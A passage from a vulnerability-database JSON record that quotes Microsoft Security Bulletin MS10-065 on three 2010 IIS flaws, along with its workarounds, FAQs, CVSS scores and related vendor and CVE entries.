CVE-2010-1899.\r\n\t\r\nMitigating Factors for IIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nASP pages are prohibited by default on IIS 6.0.\r\n\u2022\t\r\n\r\nThe vulnerability is only exploitable when the ASP script writes parameters from the request in the response.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for IIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nTemporarily disable ASP on the IIS server\r\n\r\nChange the status for ASP from ALLOWED to PROHIBITED in the IIS manager.\r\n\r\nFor Windows XP and Windows Server 2003\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect Web Service Extensions node under the server name in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nRight-click Active Server Pages in the right pane and select Prohibit.\r\n\r\nFor Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect the server node in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nSelect Handler Mappings in the right pane and double-click AspClassic.\r\n\r\n4.\r\n\t\r\n\r\nClick Request Restrictions, select the Access tab, and click None.\r\n\r\n5.\r\n\t\r\n\r\nClick OK and then click No to disallow the ISAPI extension.\r\n\r\nImpact of workaround. ASP pages will no longer work.\r\n\r\nHow to undo the workaround. \r\n\r\nChange the status for ASP from PROHIBITED to ALLOWED in the IIS manager.\r\n\r\nFor Windows XP and Windows Server 2003\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect Web Service Extensions node under the server name in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nRight-click Active Server Pages in the right pane and select Allow.\r\n\r\nFor Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2\r\n\r\n1.\r\n\t\r\n\r\nRun inetmgr.exe to launch IIS Manager.\r\n\r\n2.\r\n\t\r\n\r\nSelect the server node in the left pane.\r\n\r\n3.\r\n\t\r\n\r\nSelect Handler Mappings in the right pane and double-click AspClassic.\r\n\r\n4.\r\n\t\r\n\r\nClick Request Restrictions, select the Access tab, and click Script.\r\n\r\n5.\r\n\t\r\n\r\nClick OK and then click No to disallow the ISAPI extension.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for IIS Repeated Parameter Request Denial of Service Vulnerability - CVE-2010-1899\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a denial of service vulnerability. If an attacker sends a specially crafted request to a Web server, the server could become unresponsive. The vulnerability does not cause the server to fail or cause any data to be lost, and the server would eventually resume normal operation with a service reset.\r\n\r\nWhat causes the vulnerability? \r\nThis denial of service vulnerability is caused by a stack overflow in the ASP script processing code.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nThis is a denial of service vulnerability. An attacker who exploited this vulnerability could cause the affected system to stop responding and automatically restart. During that time, the server would be unable to respond to requests. If the attacker causes the service to restart five times, the service will then fail to restart without administrator interaction. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected service to stop accepting requests.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could send specially crafted URL requests to a Web site hosting .asp pages to exploit this denial of service vulnerability.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nAll systems running Microsoft Internet Information Services could be affected by this vulnerability.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that IIS and asp.dll handle specially crafted HTTP requests.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nRequest Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nA remote code execution vulnerability exists in Internet Information Services &#40;IIS&#41; that an attacker could exploit by sending specially crafted HTTP requests to IIS servers with FastCGI enabled.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-2730.\r\n\t\r\nMitigating Factors for Request Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nFastCGI is not enabled by default in IIS.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Request Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nDisable FastCGI\r\n\r\n1.\r\n\t\r\n\r\nLaunch the Server Manager and edit the Roles.\r\n\r\n2.\r\n\t\r\n\r\nDeselect the CGI check box and click Next.\r\n\r\nImpact of workaround. Modules that depend on FastCGI will no longer work.\r\n\r\nHow to undo the workaround. \r\n\r\nLaunch the Server Manager and add the CGI feature under Web Server.\r\n\u2022\t\r\n\r\nInstall the URL Rewrite module\r\n\r\nYou are protected when this module is installed, whether or not you are using it. For information on URL Rewrite, see URL Rewrite.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Request Header Buffer Overflow Vulnerability - CVE-2010-2730\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. A remote attacker who successfully exploited this vulnerability could then perform actions on the IIS server with the same rights as the Worker Process Identity &#40;WPI&#41;. This identity is configured to be a virtual application pool identity on Windows 7 and Windows Server 2008 R2.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that IIS servers with FastCGI enabled handle request headers.\r\n\r\nWhat is FastCGI? \r\nFastCGI for IIS enables popular application frameworks that support the FastCGI protocol to be hosted on the IIS Web server in a high-performance and reliable way. FastCGI provides a high-performance alternative to the Common Gateway Interface &#40;CGI&#41;, a standard way of interfacing external applications with Web servers that has been supported as part of the IIS feature-set since the very first release.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nA remote code execution vulnerability exists in the way that IIS handles request headers to IIS servers with FastCGI enabled. An attacker could exploit this vulnerability by creating a specially crafted HTTP request.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWeb servers with FastCGI enabled that host content.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that IIS servers with FastCGI enabled handle request headers.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nDirectory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nAn elevation of privilege vulnerability exists in Internet Information Services &#40;IIS&#41;. An attacker who successfully exploited this vulnerability could bypass the need to authenticate to access restricted resources.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-2731.\r\n\t\r\nMitigating Factors for Directory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nSites that are not using authentication are not vulnerable to this. There is no elevation of privilege attack vector for sites with only anonymous authentication.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Directory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nInstall and Use URLScan\r\n\r\nURLScan will help protect against a large number of issues stemming from improperly formed URL requests including the publicly described issues addressed by this bulletin. URLScan does not protect your system as comprehensively as either the mitigation code module or the global.asax script below. For information on URLScan, see the TechNet article, UrlScan Security Tool.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Directory Authentication Bypass Vulnerability - CVE-2010-2731\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an elevation of privilege vulnerability. An attacker could send a specially crafted request to a URL that requires authentication to bypass authentication and execute ASP script to which the attacker should not have access.\r\n\r\nWhat causes the vulnerability? \r\nThis vulnerability is caused by the way that IIS parses specially crafted URLs.\r\n\r\nDoes SSL help mitigate this vulnerability? \r\nThis is a directory bypass vulnerability. Secure Sockets Layer &#40;SSL&#41; does not help mitigate this vulnerability.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker could use this vulnerability to bypass directory-based basic authentication and access and to execute resources that should require authentication.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could send a specially crafted URL to bypass directory-based basic authentication.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWeb services using basic authentication are at risk from the vulnerability.\r\n\r\nWhat does the update do? \r\nThis update modifies the way that IIS handles specially crafted requests to prevent unauthenticated users from accessing resources hosted on the IIS server that should require authentication.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-2731.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nJinsik Shim for reporting the IIS Repeated Parameter Request Denial of Service Vulnerability &#40;CVE-2010-1899&#41;\r\n\u2022\t\r\n\r\nTravis Raybold of Rubicon West for reporting the Request Header Buffer Overflow Vulnerability &#40;CVE-2010-2730&#41;\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program &#40;MAPP&#41;\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program &#40;MAPP&#41; Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided &quot;as is&quot; without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 &#40;September 14, 2010&#41;: Bulletin published.", "edition": 1, "cvss3": {}, "published": "2010-09-16T00:00:00", "title": "Microsoft Security Bulletin MS10-065 - Important Vulnerabilities in Microsoft Internet Information Services &#40;IIS&#41; Could Allow Remote Code Execution &#40;2267960&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2010-09-16T00:00:00", "id": "SECURITYVULNS:DOC:24752", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24752", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:44", "description": "Authentication bypass, buffer overflow, DoS.", "edition": 2, "cvss3": {}, "published": "2010-09-16T00:00:00", "title": "Microsoft Internet Information Services multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2010-09-16T00:00:00", "id": "SECURITYVULNS:VULN:11145", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11145", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mskb": [{"lastseen": "2021-01-01T22:51:53", "description": "<html><body><p>Resolves vulnerabilities in Internet Information Services (IIS) that could allow remote code execution if a user received a specially crafted HTTP request. An attacker who successfully exploited this vulnerability could take complete control of an affected system.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-065. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/201009.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/201009.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-065.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS10-065.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3> <br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed below each article link.<br/> <br/><ul class=\"sbody-free_list\"><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2124261\" id=\"kb-link-8\">2124261 </a> MS10-065: Description of the security update for Internet Information Services ASP: September 14, 2010 </div>Known issues in security update 2124261:<br/><br/><ul class=\"sbody-free_list\"><li>When you install security update 2124261 on a computer that is running Windows XP SP3 and that is not running IIS, the update may seem to install successfully. In this scenario, an entry is added to the <strong class=\"uiterm\">Add or Remove Programs</strong> item in Control Panel. However, no files are installed on the computer. The files are not cached locally for use if IIS is enabled at a later date.</li></ul></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2271195\" id=\"kb-link-9\">2271195 </a> MS10-065: Description of the security update for Internet Information Services CGI: September 14, 2010</div>Known issues in security update 2271195:<br/><ul class=\"sbody-free_list\"><li>The version of cgi.dll (7.5.7600.16385) that is released in Service Pack 1 (SP1) for Windows 7 and Windows Server 2008 R2 has an earlier version number than the version number of cgi.dll (7.5.7600.16632) that is released in security update 2271195. However, security update 2271195 is contained in cgi.dll version 7.5.7600.16385 that is released in the Service Pack. Therefore,\u00a0no additional action is required by the user.\u00a0</li></ul></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2290570\" id=\"kb-link-10\">2290570 </a> MS10-065: Description of the security update for Internet Information Services Infocomm: September 14, 2010</div></li></ul></div></body></html>", "edition": 2, "cvss3": {}, "published": "2012-07-18T18:49:39", "type": "mskb", "title": "MS10-065: Vulnerabilities in Microsoft Internet Information Services (IIS) could allow remote code execution", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730", "CVE-2010-1899", "CVE-2010-2731"], "modified": "2012-07-18T18:49:39", "id": "KB2267960", "href": "https://support.microsoft.com/en-us/help/2267960/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:34:05", "description": "IIS is a collection of Internet services packaged with several versions of the Windows operating system. An elevation of privilege vulnerability has been reported in Microsoft Internet Information Services (IIS). The vulnerability is due to the way IIS parses specially crafted URLs. An attacker may exploit this issue by via a specially crafted URL to bypass directory based basic authentication. Successful exploitation of this vulnerability would allow the attacker to access and execute resources that should require authentication.", "cvss3": {}, "published": "2010-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Directory Authentication Bypass (MS10-065; CVE-2010-1899; CVE-2010-2731)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899", "CVE-2010-2731"], "modified": "2016-03-21T00:00:00", "id": "CPAI-2010-262", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T12:35:07", "description": "IIS is a collection of Internet services packaged with several versions of the Windows operating system. A denial of service vulnerability has been reported in Microsoft Internet Information Services (IIS). A remote attacker could use this issue to create a denial of service condition, thus crashing the vulnerable service. The vulnerability is due to a stack overflow error in the IIS service resulting from excessive recursion. An attacker may exploit this issue by crafting an HTTP POST request that will cause the server to become unresponsive for some period of time. Successful exploitation of this vulnerability would cause the affected system to stop responding and automatically restart.", "cvss3": {}, "published": "2010-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Repeated Parameter Request Denial of Service (MS10-065; CVE-2010-1899)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899"], "modified": "2014-03-17T00:00:00", "id": "CPAI-2010-260", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-05T00:08:56", "description": "A buffer overflow vulnerability has been reported in Microsoft Internet Information Services (IIS) with FastCGI enabled. IIS is a collection of Internet services packaged with several versions of the Windows operating system. FastCGI for IIS enables popular application frameworks that support the FastCGI protocol to be hosted on the IIS web server. A remote attacker could use this issue to execute arbitrary code on an affected system.", "cvss3": {}, "published": "2010-09-14T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against Microsoft IIS Request Header Buffer Overflow Vulnerability (MS10-065)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730"], "modified": "2010-01-01T00:00:00", "id": "CPAI-2010-261", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:16:55", "description": "A code execution vulnerability exists in Microsoft Internet Information Services (IIS) when FastCGI is enabled. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process. The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server.", "cvss3": {}, "published": "2013-12-02T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Request Header Buffer Overflow (MS10-065; CVE-2010-2730)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730"], "modified": "2013-12-18T00:00:00", "id": "CPAI-2013-3631", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-26T09:26:33", "description": "A code execution vulnerability exists in Microsoft Internet Information Services (IIS).", "cvss3": {}, "published": "2013-12-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft IIS Request Header Buffer Overflow (MS10-065; CVE-2010-2730) - ver 2", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-2730"], "modified": "2022-05-26T00:00:00", "id": "CPAI-2013-3648", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T12:02:35", "description": "Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, related to asp.dll, aka \"IIS Repeated Parameter Request Denial of Service Vulnerability.\"", "cvss3": {}, "published": "2010-09-15T19:00:00", "type": "cve", "title": "CVE-2010-1899", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1899"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/a:microsoft:internet_information_server:6.0", "cpe:/a:microsoft:internet_information_services:7.5"], "id": "CVE-2010-1899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1899", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_services:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:18:01", "description": "Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka \"Directory Authentication Bypass Vulnerability.\"", "cvss3": {}, "published": "2010-09-15T19:00:00", "type": "cve", "title": "CVE-2010-2731", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2731"], "modified": "2020-11-23T19:49:00", "cpe": [], "id": "CVE-2010-2731", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2731", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T12:17:59", "description": "Buffer overflow in Microsoft Internet Information Services (IIS) 7.5, when FastCGI is enabled, allows remote attackers to execute arbitrary code via crafted headers in a request, aka \"Request Header Buffer Overflow Vulnerability.\"", "cvss3": {}, "published": "2010-09-15T19:00:00", "type": "cve", "title": "CVE-2010-2730", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2730"], "modified": "2021-02-05T15:37:00", "cpe": ["cpe:/a:microsoft:internet_information_services:7.5"], "id": "CVE-2010-2730", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_services:7.5:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T18:08:15", "description": "BUGTRAQ ID: 43140\r\nCVE ID: CVE-2010-1899\r\n\r\nMicrosoft Internet\u4fe1\u606f\u670d\u52a1\uff08IIS\uff09\u662fMicrosoft Windows\u81ea\u5e26\u7684\u4e00\u4e2a\u7f51\u7edc\u4fe1\u606f\u670d\u52a1\u5668\uff0c\u5176\u4e2d\u5305\u542bHTTP\u670d\u52a1\u529f\u80fd\u3002\r\n\r\nIIS\u4e2d\u7684\u811a\u672c\u5904\u7406\u4ee3\u7801\u5728\u5904\u7406\u91cd\u590d\u7684\u53c2\u6570\u8bf7\u6c42\u65f6\u5b58\u5728\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5bf9IIS\u6240\u627f\u8f7d\u7f51\u7ad9\u7684ASP\u9875\u9762\u53d1\u9001\u7279\u5236URI\u8bf7\u6c42\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u670d\u52a1\u5d29\u6e83\u3002\n\nMicrosoft IIS 7.5\r\nMicrosoft IIS 7.0\r\nMicrosoft IIS 6.0\r\nMicrosoft IIS 5.1\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u5728IIS\u670d\u52a1\u5668\u4e0a\u4e34\u65f6\u7981\u7528ASP\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS10-065\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS10-065\uff1aVulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution (2267960)\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS10-065.mspx?pf=true", "cvss3": {}, "published": "2010-09-17T00:00:00", "type": "seebug", "title": "Microsoft 